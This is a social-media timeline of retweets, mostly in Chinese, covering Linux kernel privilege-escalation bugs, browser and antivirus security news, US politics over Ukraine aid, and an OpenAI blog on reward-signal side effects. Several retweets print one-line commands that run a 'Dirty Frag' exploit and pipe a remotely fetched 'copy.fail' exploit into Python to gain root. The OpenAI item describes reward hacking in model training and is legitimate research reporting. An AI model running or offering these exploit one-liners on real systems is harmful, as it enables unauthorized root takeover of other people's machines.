Nikko
7.3K posts
Nikko ретвитнул
一刻也没有为CopyFail的离去而感到悲伤,接下来到达战场的是:Dirty Frag!
git clone github.com/V4bel/dirtyfra… && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
ZianTT@ZianTT_Official
🔥还在担心忘记root密码吗,不要慌,一行命令就能帮你从低权限找回你的root权限🔥 curl copy.fail/exp | python3 && su CVE-2026-31431,影响2017至今的distro 与dirtycow不同的是,它无需race即可提权,利用范围比dirtypipe广,基本上是核弹级了 当然你也可以留着防止哪天忘了root密码(x
中文
@BGB1008 @Sizhe_bitcat 这个需要银行破产才能触发,但在处理完包商银行的案例后,现有保险基金不足,所以河南村镇银行的处理办法是拖着不破产,就不会触发保险赔偿。
中文
Nikko ретвитнул
[已恢复] 微软发布的 Microsoft Defender 安全更新错误将系统根证书检测为病毒,导致大量用户收到检测到恶意软件的提醒。
被拦截的证书是 DigiCert 的根证书,本来微软应该拦截被盗的泄露证书,但不知道怎样的操作能将签发数百万份证书的 DC 根证书给拦截了。
查看详情:ourl.co/112841
中文
Nikko ретвитнул
Microsoft Edge loads all your saved passwords into memory in cleartext — even when you’re not using them.
English
Nikko ретвитнул
Nikko ретвитнул
Nikko ретвитнул
Nikko ретвитнул
Nikko ретвитнул
Nikko ретвитнул
安全研究公司 Xint Code(隶属 Theori)于今日公开披露了一个 Linux 内核高危漏洞,编号 为 CVE-2026-31431 命名为"Copy Fail"。
漏洞根植于内核加密子系统的 algif_aead 模块,允许任何本地普通用户以确定性、无竞争的方式在任意可读文件的页缓存中写入受控的 4 字节数据,并借此将自身权限提升至 root,可以实现本地提权与容器逃逸。
Xint@xint_official
Patch your Linux boxes! Copy.Fail is a trivially exploitable logic bug in Linux, reachable on all major distros released in the last 9 years. A small, portable python script gets root on all platforms. Found by the teams at @theori_io and @xint_official More details below xint.io/blog/copy-fail…
中文
Nikko ретвитнул
🚨为什么五角大楼要扣留援乌资金?限制军方高层交流,白宫内部正在清除所有真正支持乌克兰的人。美国现在的政坛已经乱到了“共和党大佬要靠写报纸专栏来抗议共和党总统的副部长”的地步。--华盛顿邮报
---共和党内最有权势的建制派大佬、参议院前多数党领袖米奇·麦康奈尔亲笔撰写的评论文章
这篇文章详细揭示了目前华盛顿权力运作中一个极其荒唐且危险的现状:即使国会已经投票通过、法律已经生效的援乌拨款,依然可以被行政部门内部的单一高官以“行政流程”为由无限期卡死。
麦康奈尔说:“国会批准的2026财年9000亿美元国防授权法案中,两大军事委员会的共和党多数派都授权通过“乌克兰安全援助倡议”,拨款委员会以压倒性优势批准在2026财年向乌克兰全额拨付4亿美元,并在2027年提供了另外4亿美元。
麦康奈尔表示,国会共和党多数派恢复了这笔拨款,因为他们认为这是对国家安全的重要投资。
他写道:“在全面战争爆发的头两年,对乌克兰的支持促使数十亿美元投资流向美国国防工业基地。”
他补充道:“然而,当参议院拨款委员会向国防部负责政策的部门(由副部长埃尔布里奇·科尔比领导)寻求解释时,却遭到了阻挠。”
📌1. 权力阻断点:五角大楼的“技术性否决”
文章指出,国会数月前就批准了这笔 4 亿美元的对乌援助资金,这笔资金原本用于支付美国公司为乌克兰武装部队生产高优先级武器的费用。然而,这笔钱目前被冻结在五角大楼。
✅科尔比的角色: 作为五角大楼政策体系的掌门人,科尔比被指控利用其审批权限,要求对每一笔援助进行所谓的“战略重新评估”。
✅麦康奈尔指出,据媒体报道,科尔比去年决定暂停向乌克兰运送武器。
“这似乎并非科尔比第一次这样做。据报道,去年正是他主导了暂停向基辅运送武器的决定——一位消息人士称,这一决定令唐纳德·川普总统‘措手不及’,”他写道。
“科尔比还认定,向乌克兰和美国在波罗的海的北约盟国提供的安全援助是‘浪费’的,并将这些长期项目从2026财年的预算申请中移除,”他指出。
✅拖延手段: 文章称他并没说“不给”,而是通过要求不断的“额外研究报告”和“对美军库存影响的重新审计”,让这笔钱陷入了无穷无尽的官僚循环中。
📌2. 科尔比的逻辑:“太平洋优先”vs“乌克兰”
科尔比是著名的“亚洲优先”战略推行者。文章剖析了他的战略逻辑,也是他卡住援乌资金的“冠冕堂皇”的理由:
✅资源有限论: 他认为美国没有能力同时支持两场战争,必须节省每一分钱和每一枚导弹来应对亚太地区的潜在冲突。
✅施压手段: 文章指出,通过卡住这 4 亿美元,科尔比实际上是在绕过国会意愿,强行推行他个人的地缘政治优先级。
📌3. “莫须有”的程序:
文章特别提到了一个令人不安的共同点:司法部和国防部都在经历一种“规则武器化”的过程。
在司法部: 托德·布兰奇利用模糊的“威胁隐喻”去抓科米。
在五角大楼: 科尔比利用模糊的“国家安全评估程序”去推翻国会的拨款命令。
📌限制军方高层及交流
麦康奈尔还批评国防部领导层限制获准前往乌克兰的美国顾问人数,并声称这项政策限制了五角大楼了解战场创新技术的能力。
“我知道……一些军官渴望将乌克兰的反无人机和电子战经验运用到美国陆军未来冲突的准备工作中。然而,如果他们无法亲身观察战争,就无法从中学习,”他写道。
“尽管如此,五角大楼仍然延续着拜登政府的政策,大幅限制获准协助乌克兰并近距离观察冲突的军事教官人数,”他补充道。
与此同时,麦康奈尔表示,美国的对手,例如伊朗,一直渴望从乌克兰的战场上学习新的战术。
“他们正在学习和适应。伊朗对波斯湾的美国人员和设施发动袭击,其致命的无人机攻击已经清楚地表明了这一点,”他写道。“朝鲜也同样介入其中,向俄罗斯派遣军队并非出于善意,而是为了获得战术经验并与莫斯科建立更紧密的联系。”
麦康奈尔警告说,中国在制定军事投资和计划时,“无疑正在密切关注乌克兰局势”。
然而,他遗憾地表示,“五角大楼至今仍未解释为何尚未履行对乌克兰的适度投资义务并付诸实施。”
麦康奈尔认为, 这种行为在过去被视为“违宪”或至少是“行政僭越”,但在现在的政治环境下,这被包装成了“专业评估”。
📌4. 文章对“美国体制”的警告
《华盛顿邮报》的这篇文章最后发出了一连串极其悲观的拷问:
✅法律还有效吗?
‼️如果总统任命的一个副部长就可以瘫痪国会通过的法律,那么美国的权力平衡 就彻底失效了。‼️
✅信誉的代价:
当乌克兰前线因为缺乏这 4 亿美金的弹药而丢掉阵地时,美国向世界证明了:它的承诺随时可以因为一个华盛顿官僚的个人意志而作废。
📌5. 辞职潮的连动
文章还联结了驻乌大使辞职事件。文章认为,科尔比在五角大楼的动作,与戴维斯大使的辞职是同一场“风暴”的两个面:
白宫内部正在清除所有真正支持乌克兰的人,并利用行政手段让乌克兰陷入孤立无援的境地,从而逼迫其接受割地求和的协议。
📌麦康奈尔一直是乌克兰最坚定的支持者之一。在“川普时代”的共和党内部,他代表着最后的传统建制派防线。
他亲自写这篇文章,是为了利用他在国家安全领域的资历和威望,强迫白宫和五角大楼做出回应。
‼️说明麦康奈尔已经无法通过正常的党内渠道(或与白宫的私下沟通)来解决这 4 亿美元被卡住的问题。‼️
他不得不选择公开“公开信”的方式,把矛头对准五角大楼的埃尔布里奇·科尔比。
‼️美国现在的政坛已经乱到了“共和党大佬要靠写报纸专栏来抗议共和党总统的副部长”的地步。‼️
这种体制内的公开叫板,进一步证明了——美国政府内部的规则感和等级秩序正在发生极其剧烈的崩塌。
rainbow7852@rainbow78521
🚨美国驻乌克兰大使朱莉·戴维斯因与川普存在分歧而辞职,她的前任布里奇特·布林克去年4月辞职,这不仅标志着美乌关系的剧烈动荡,更揭示了美国外交决策权力的本质位移,这不仅仅是两个人的离开,而是美乌关系“特殊盟友期”的正式终结。— FT 美国国务院周二宣布,美国驻基辅大使馆代理代办朱莉·戴维斯宣布辞职。她将于2026年6月离开外交部门。 《金融时报》此前报道称,戴维斯离职的原因是她与唐纳德·川普总统的政策存在分歧,以及她对川普对乌克兰支持力度减弱感到失望。 然而,美国国务院驳斥了这一说法,称其“不实”。 📌两任驻乌克兰使节的接连辞职,是美国外交史上极其罕见的现象。这不仅标志着美乌关系的剧烈动荡,更揭示了美国外交决策权力的本质位移。 ✅外交“建制派”与总统意志的公开决裂 这两位外交官都是拥有数十年经验的职业外交官 。 布林克和戴维斯代表了美国过去三十年的传统外交逻辑:支持盟友、抵抗侵略、维护二战后的国际秩序。 川普政府在2025年后推行的“美国优先”政策,核心是将乌克兰从“民主前哨”降级为“谈判筹码”。 对于这些视乌克兰主权为红线的职业外交官来说,这种从“全力支持”到“施压停火/割地”的转变,在道德和职业信誉上是无法接受的。 ✅美国外交从“基于原则”转向“基于交易” 连续两任特使辞职,说明美国对乌政策已彻底转向交易型现实主义: 布林克辞职的原因之一是美国开始向受害者(乌克兰)施压,而非侵略者(俄罗斯)。 在这一时期,正式的外交渠道(大使馆)往往被总统的私人密使或特使(如斯蒂夫·威特科夫)绕过。 当大使发现自己不再是沟通的桥梁,甚至被排除在核心谈判之外时,辞职成了维护尊严的唯一选择。 ✅美国在欧洲信誉的“灯塔熄灭” 大使的离职往往伴随着强烈的辞职信或媒体放风,这向欧洲盟友传递了极度不安的信号: 盟友们发现,即使是美国最高级别的驻外官员也无法保障美国政策的连贯性。 连续的离职证明了川普对乌克兰的“冷淡”不是谈判策略,而是坚定的战略撤退。 这迫使欧洲不得不组建“志愿联盟”来填补美国留下的真空。 ✅内部“清洗”与人才流失 在外交学界,这被视为一种“体制性的坍塌”。 ‼️如果连经验最丰富的乌克兰专家都无法与白宫共事,那么接下来的职位可能会由更具“政治忠诚度”但缺乏专业背景的政治任命者接替。‼️ 这会导致美国对前线情报的判断出现偏差, ‼️因为大使馆的报告可能不再基于客观事实,而是基于“总统想听什么”。‼️ 📌这不仅仅是两个人的离开,而是美乌关系“特殊盟友期”的正式终结。 它说明现在的美国政府已经不再关心“如何赢得战争”,而只关心“如何快速结束战争”。 ‼️传统的规则和体面,正在被一种更直接、更冷酷的权力意志所取代。‼️
中文
Nikko ретвитнул
OpenAI 发了一篇技术博客,认真调查了一个荒诞的问题:为什么他们的模型越来越爱说“哥布林”(goblin)和“小精灵”(gremlin)?
事情最早在去年 11 月 GPT-5.1 上线后被注意到。用户反馈模型说话太过自来熟,内部一查,发现包含“goblin”的对话比之前暴涨了 175%,“gremlin”涨了 52%。当时觉得比例还小,没太当回事。
几个月后 GPT-5.4 上线,哥布林彻底泛滥,用户和员工都受不了了。OpenAI 这才认真追查,最终锁定了罪魁祸首:ChatGPT 的性格定制功能。
ChatGPT 有八种可选性格,其中一种叫“Nerdy”(极客风)。训练这个性格时,奖励模型被设定为鼓励"俏皮、有趣的表达",结果无意中给了包含奇幻生物比喻的回复更高的分数。模型很快学会了一个捷径:提到哥布林就能拿高分。
问题在于,这个习惯没有老老实实待在极客性格里。数据显示,Nerdy 性格只占 ChatGPT 全部回复的 2.5%,却贡献了 66.7% 的“goblin”出现次数。从 GPT-5.2 到 GPT-5.4,Nerdy 性格下的哥布林出现率飙升了 3881%。更麻烦的是,即使在没有 Nerdy 性格提示词的对话中,哥布林也在同步增长。
OpenAI 给出的解释是一个经典的反馈循环:强化学习先在极客性格里奖励了这种表达,然后模型生成的带哥布林的回复被收录进了下一轮训练数据,模型因此更加习惯输出哥布林,如此循环放大。除了哥布林,浣熊、巨魔、食人魔、鸽子也都被查出是同一机制产生的“tic词”(语言习惯性抽搐)。
【注:tic 原本是医学术语,指不自主的重复动作或发声,OpenAI 在这里借用来形容模型养成的不受控语言习惯。】
修复方面,OpenAI 在今年 3 月下架了 Nerdy 性格,移除了相关奖励信号,并过滤了训练数据中的生物词。但 GPT-5.5 的训练在找到根因之前就已经开始,所以新模型依然带着哥布林习性出厂。目前的临时方案是在 Codex(OpenAI 的编程工具)里通过系统提示词压制。博客里甚至贴了一段命令行代码,教你怎么把哥布林抑制指令去掉,"让小精灵们自由奔跑"。
这篇博客表面上是讲一个好笑的 bug,底下其实揭示了一个 AI 训练的核心难题:你给模型的每一个微小的奖励信号,都可能在你不知道的地方被放大和泛化。一个只针对 2.5% 用户的性格训练,最终污染了整个模型的语言习惯。
OpenAI@OpenAI
We’re talking about Goblins. openai.com/index/where-th…
中文
datatracker.ietf.org/doc/rfc9963/ RFC 9963 发布了,这次是为了让 TPM 1.2 芯片能支持TLS1.3的client cert,这样能让一些老电脑获得更好的安全体验。
中文